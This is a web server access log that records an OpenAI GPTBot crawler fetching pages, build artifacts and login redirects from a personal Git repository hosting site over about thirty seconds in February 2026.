"/windpacer/windpacer/raw/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11103] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10777] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:21:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:17:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build" +[17/Feb/2026:17:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15014] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13847] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13848] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:17:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20164] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13849] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15014] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20148] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14985] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14279] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:17:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20165] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:17:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:17:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15015] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:17:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14247] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" +[17/Feb/2026:17:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13833] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20167] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 